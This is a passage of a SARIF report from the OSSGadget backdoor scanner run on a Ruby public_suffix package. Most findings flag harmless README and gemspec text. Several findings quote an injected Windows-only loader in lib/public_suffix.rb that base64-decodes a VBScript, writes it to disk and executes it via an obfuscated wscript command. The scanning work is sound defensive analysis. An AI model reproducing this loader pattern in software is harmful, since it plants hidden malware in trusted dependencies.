{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.0.0+4a24249b20"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/.PKGINFO"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 65,
                  "endLine": 7,
                  "endColumn": 70,
                  "snippet": {
                    "text": "arch = x86_64\nsize = 456462\norigin = ruby3.2-public_suffix\npkgdesc = PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\nurl = \ncommit = \nlicense = MIT\n",
                    "rendered": {
                      "text": "arch = x86_64\nsize = 456462\norigin = ruby3.2-public_suffix\npkgdesc = PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\nurl = \ncommit = \nlicense = MIT\n",
                      "markdown": "`arch = x86_64\nsize = 456462\norigin = ruby3.2-public_suffix\npkgdesc = PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\nurl = \ncommit = \nlicense = MIT\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/public_suffix/rule.rb"
                },
                "region": {
                  "startLine": 168,
                  "startColumn": 7,
                  "endLine": 168,
                  "endColumn": 13,
                  "snippet": {
                    "text": "        # rules like foo.*.com. If the assumption is incorrect,\n        # we need to properly walk the input and skip parts according\n        # to wildcard component.\n        diff = name.chomp(value)\n        diff.empty? || diff.end_with?(DOT)\n      end\n\n",
                    "rendered": {
                      "text": "        # rules like foo.*.com. If the assumption is incorrect,\n        # we need to properly walk the input and skip parts according\n        # to wildcard component.\n        diff = name.chomp(value)\n        diff.empty? || diff.end_with?(DOT)\n      end\n\n",
                      "markdown": "`        # rules like foo.*.com. If the assumption is incorrect,\n        # we need to properly walk the input and skip parts according\n        # to wildcard component.\n        diff = name.chomp(value)\n        diff.empty? || diff.end_with?(DOT)\n      end\n\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/specifications/public_suffix-6.0.1.gemspec"
                },
                "region": {
                  "startLine": 13,
                  "startColumn": 74,
                  "endLine": 13,
                  "endColumn": 79,
                  "snippet": {
                    "text": "  s.require_paths = [\"lib\".freeze]\n  s.authors = [\"Simone Carletti\".freeze]\n  s.date = \"1970-01-01\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\".freeze\n  s.email = [\"weppos@weppos.net\".freeze]\n  s.extra_rdoc_files = [\"LICENSE.txt\".freeze]\n  s.files = [\"LICENSE.txt\".freeze]\n",
                    "rendered": {
                      "text": "  s.require_paths = [\"lib\".freeze]\n  s.authors = [\"Simone Carletti\".freeze]\n  s.date = \"1970-01-01\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\".freeze\n  s.email = [\"weppos@weppos.net\".freeze]\n  s.extra_rdoc_files = [\"LICENSE.txt\".freeze]\n  s.files = [\"LICENSE.txt\".freeze]\n",
                      "markdown": "`  s.require_paths = [\"lib\".freeze]\n  s.authors = [\"Simone Carletti\".freeze]\n  s.date = \"1970-01-01\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\".freeze\n  s.email = [\"weppos@weppos.net\".freeze]\n  s.extra_rdoc_files = [\"LICENSE.txt\".freeze]\n  s.files = [\"LICENSE.txt\".freeze]\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/specifications/public_suffix-6.0.1.gemspec"
                },
                "region": {
                  "startLine": 2,
                  "startColumn": 27,
                  "endLine": 2,
                  "endColumn": 33,
                  "snippet": {
                    "text": "# -*- encoding: utf-8 -*-\n# stub: public_suffix 6.0.1 ruby lib\n\nGem::Specification.new do |s|\n  s.name = \"public_suffix\".freeze\n",
                    "rendered": {
                      "text": "# -*- encoding: utf-8 -*-\n# stub: public_suffix 6.0.1 ruby lib\n\nGem::Specification.new do |s|\n  s.name = \"public_suffix\".freeze\n",
                      "markdown": "`# -*- encoding: utf-8 -*-\n# stub: public_suffix 6.0.1 ruby lib\n\nGem::Specification.new do |s|\n  s.name = \"public_suffix\".freeze\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/public_suffix.gemspec"
                },
                "region": {
                  "startLine": 12,
                  "startColumn": 74,
                  "endLine": 12,
                  "endColumn": 79,
                  "snippet": {
                    "text": "  s.email = [\"weppos@weppos.net\"]\n\n  s.summary = \"Domain name parser based on the Public Suffix List.\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\"\n  s.homepage = \"https://simonecarletti.com/code/publicsuffix-ruby\"\n  s.licenses = [\"MIT\"]\n  s.required_ruby_version = \">= 3.0\"\n",
                    "rendered": {
                      "text": "  s.email = [\"weppos@weppos.net\"]\n\n  s.summary = \"Domain name parser based on the Public Suffix List.\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\"\n  s.homepage = \"https://simonecarletti.com/code/publicsuffix-ruby\"\n  s.licenses = [\"MIT\"]\n  s.required_ruby_version = \">= 3.0\"\n",
                      "markdown": "`  s.email = [\"weppos@weppos.net\"]\n\n  s.summary = \"Domain name parser based on the Public Suffix List.\"\n  s.description = \"PublicSuffix can parse and decompose a domain name into top level domain, domain and subdomains.\"\n  s.homepage = \"https://simonecarletti.com/code/publicsuffix-ruby\"\n  s.licenses = [\"MIT\"]\n  s.required_ruby_version = \">= 3.0\"\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/public_suffix.rb"
                },
                "region": {
                  "startLine": 22,
                  "startColumn": 5,
                  "endLine": 22,
                  "endColumn": 10,
                  "snippet": {
                    "text": "      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\n",
                    "rendered": {
                      "text": "      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\n",
                      "markdown": "`      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/public_suffix.rb"
                },
                "region": {
                  "startLine": 23,
                  "startColumn": 20,
                  "endLine": 23,
                  "endColumn": 26,
                  "snippet": {
                    "text": "      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\nrescue => e\n",
                    "rendered": {
                      "text": "      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\nrescue => e\n",
                      "markdown": "`      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n      system(decoded_cmd)\n  end\nrescue => e\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/lib/public_suffix.rb"
                },
                "region": {
                  "startLine": 20,
                  "startColumn": 16,
                  "endLine": 20,
                  "endColumn": 22,
                  "snippet": {
                    "text": " \n  if os.match(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)\n      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n",
                    "rendered": {
                      "text": " \n  if os.match(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)\n      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n",
                      "markdown": "` \n  if os.match(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)\n      vbs_out = \"RGltIG9ialdTSCxv---...---IA0K\"\n      content = Base64.decode64(vbs_out.gsub(\"---\", \"\"))\n      File.open(\"the_Score.vbs\", \"w\") { |file| file.write(content) }\n      cmd = \"d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz\".gsub(\"---\", \"\")\n      decoded_cmd = Base64.decode64(cmd)\n`"
                    }
                  },
                  "sourceLanguage": "ruby"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 192,
                  "startColumn": 22,
                  "endLine": 192,
                  "endColumn": 31,
                  "snippet": {
                    "text": "make any HTTP requests to parse or validate a domain.\n\n\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n",
                    "rendered": {
                      "text": "make any HTTP requests to parse or validate a domain.\n\n\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n",
                      "markdown": "`make any HTTP requests to parse or validate a domain.\n\n\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 190,
                  "startColumn": 164,
                  "endLine": 190,
                  "endColumn": 168,
                  "snippet": {
                    "text": "\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n",
                    "rendered": {
                      "text": "\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n",
                      "markdown": "`\n## Support\n\nLibrary documentation is auto-generated from the [README](https://github.com/weppos/publicsuffix-ruby/blob/master/README.md) and the source code, and it's available at https://rubydoc.info/gems/public_suffix.\n\n- The PublicSuffix bug tracker is here: https://github.com/weppos/publicsuffix-ruby/issues\n- The PublicSuffix code repository is here: https://github.com/weppos/publicsuffix-ruby. Contributions are welcome! Please include tests and/or feature coverage for every patch, and create a topic branch for every separate change you make.\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 174,
                  "startColumn": 252,
                  "endLine": 174,
                  "endColumn": 256,
                  "snippet": {
                    "text": "ore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent cookies from being set where they shouldn't be, the list can also potentially be used for other applications where the registry controlled and privately controlled parts of a domain name nee",
                    "rendered": {
                      "text": "ore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent cookies from being set where they shouldn't be, the list can also potentially be used for other applications where the registry controlled and privately controlled parts of a domain name nee",
                      "markdown": "`ore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent cookies from being set where they shouldn't be, the list can also potentially be used for other applications where the registry controlled and privately controlled parts of a domain name nee`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 174,
                  "startColumn": 65,
                  "endLine": 174,
                  "endColumn": 69,
                  "snippet": {
                    "text": "o.uk which will be passed onto every website registered under co.uk.\n\nClearly, this was a security risk as it allowed websites other than the one setting the cookie to read it, and therefore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent coo",
                    "rendered": {
                      "text": "o.uk which will be passed onto every website registered under co.uk.\n\nClearly, this was a security risk as it allowed websites other than the one setting the cookie to read it, and therefore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent coo",
                      "markdown": "`o.uk which will be passed onto every website registered under co.uk.\n\nClearly, this was a security risk as it allowed websites other than the one setting the cookie to read it, and therefore potentially extract sensitive information.\n\nSince there is no algorithmic method of finding the highest level at which a domain may be registered for a particular top-level domain (the policies differ with each registry), the only method is to create a list of all top-level domains and the level at which domains can be registered. This is the aim of the effective TLD list.\n\nAs well as being used to prevent coo`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000600"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Windows Indicator",
            "id": "BD000600"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 141,
                  "startColumn": 39,
                  "endLine": 141,
                  "endColumn": 43,
                  "snippet": {
                    "text": "PublicSuffix.valid?(\"something.blogspot.com\", ignore_private: true)\n```\n\nIf you don't care about private domains at all, it's more efficient to exclude them when the list is parsed:\n\n```ruby\n# Disable support for private TLDs\n",
                    "rendered": {
                      "text": "PublicSuffix.valid?(\"something.blogspot.com\", ignore_private: true)\n```\n\nIf you don't care about private domains at all, it's more efficient to exclude them when the list is parsed:\n\n```ruby\n# Disable support for private TLDs\n",
                      "markdown": "`PublicSuffix.valid?(\"something.blogspot.com\", ignore_private: true)\n```\n\nIf you don't care about private domains at all, it's more efficient to exclude them when the list is parsed:\n\n```ruby\n# Disable support for private TLDs\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 216,
                  "startColumn": 5,
                  "endLine": 216,
                  "endColumn": 10,
                  "snippet": {
                    "text": "\n## Definitions\n\ntld = Top level domain, this is in reference to the last segment of a domain, sometimes the part that is directly after the \"dot\" symbol. For example, `mozilla.org`, the `.org` portion is the tld.\n\nsld = Second level domain, a domain that is directly below a top-level domain. For example, in `https://www.mozilla.org/en-US/`, `mozilla` is the second-level domain of the .org tld.\n\n",
                    "rendered": {
                      "text": "\n## Definitions\n\ntld = Top level domain, this is in reference to the last segment of a domain, sometimes the part that is directly after the \"dot\" symbol. For example, `mozilla.org`, the `.org` portion is the tld.\n\nsld = Second level domain, a domain that is directly below a top-level domain. For example, in `https://www.mozilla.org/en-US/`, `mozilla` is the second-level domain of the .org tld.\n\n",
                      "markdown": "`\n## Definitions\n\ntld = Top level domain, this is in reference to the last segment of a domain, sometimes the part that is directly after the \"dot\" symbol. For example, `mozilla.org`, the `.org` portion is the tld.\n\nsld = Second level domain, a domain that is directly below a top-level domain. For example, in `https://www.mozilla.org/en-US/`, `mozilla` is the second-level domain of the .org tld.\n\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 19,
                  "startColumn": 72,
                  "endLine": 19,
                  "endColumn": 78,
                  "snippet": {
                    "text": "\n## Requirements\n\n<tt>PublicSuffix</tt> requires **Ruby >= 3.0**. For an older versions of Ruby use a previous release.\n\n\n## Installation\n",
                    "rendered": {
                      "text": "\n## Requirements\n\n<tt>PublicSuffix</tt> requires **Ruby >= 3.0**. For an older versions of Ruby use a previous release.\n\n\n## Installation\n",
                      "markdown": "`\n## Requirements\n\n<tt>PublicSuffix</tt> requires **Ruby >= 3.0**. For an older versions of Ruby use a previous release.\n\n\n## Installation\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 3,
                  "startColumn": 26,
                  "endLine": 3,
                  "endColumn": 32,
                  "snippet": {
                    "text": "# Public Suffix <small>for Ruby</small>\n\n<tt>PublicSuffix</tt> is a Ruby domain name parser based on the [Public Suffix List](https://publicsuffix.org/).\n\n[![Build Status](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml/badge.svg)](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml)\n[![Tidelift dependencies](https://tidelift.com/badges/package/rubygems/public_suffix)](https://tidelift.com/subscription/pkg/rubygems-public-suffix?utm_source=rubygems-public-suffix&utm_medium=referral&utm_campaign=enterprise)\n",
                    "rendered": {
                      "text": "# Public Suffix <small>for Ruby</small>\n\n<tt>PublicSuffix</tt> is a Ruby domain name parser based on the [Public Suffix List](https://publicsuffix.org/).\n\n[![Build Status](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml/badge.svg)](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml)\n[![Tidelift dependencies](https://tidelift.com/badges/package/rubygems/public_suffix)](https://tidelift.com/subscription/pkg/rubygems-public-suffix?utm_source=rubygems-public-suffix&utm_medium=referral&utm_campaign=enterprise)\n",
                      "markdown": "`# Public Suffix <small>for Ruby</small>\n\n<tt>PublicSuffix</tt> is a Ruby domain name parser based on the [Public Suffix List](https://publicsuffix.org/).\n\n[![Build Status](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml/badge.svg)](https://github.com/weppos/publicsuffix-ruby/actions/workflows/tests.yml)\n[![Tidelift dependencies](https://tidelift.com/badges/package/rubygems/public_suffix)](https://tidelift.com/subscription/pkg/rubygems-public-suffix?utm_source=rubygems-public-suffix&utm_medium=referral&utm_campaign=enterprise)\n`"
                    }
                  },
                  "sourceLanguage": "Unknown"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000704"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Hostname)",
            "id": "BD000704"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset3/ruby/ruby3.2-public_suffix-6.0.0-r0.apk/ruby3.2-public_suffix-6.0.0-r0/usr/lib/ruby/gems/3.2.0/gems/public_suffix-6.0.1/README.md"
                },
                "region": {
                  "startLine": 222,
                  "startColumn": 168,
                  "endLine": 222,
                  "endColumn": 176,
                  "snippet": {
                    "text": "\ntrd = Transit routing domain, or known as a subdomain. This is the part of the domain that is before the sld or root domain. For example, in `https://www.mozilla.org/en-US/`, `www` is the trd.\n\nFQDN = Fully Qualified Domain Names, are domain names that are written with the hostname and the domain name, and include the top-level domain, the format looks like `[hostname].[domain].[tld].` for ex. `[www].[mozilla].[org]`.\n",
                    "rendered": {
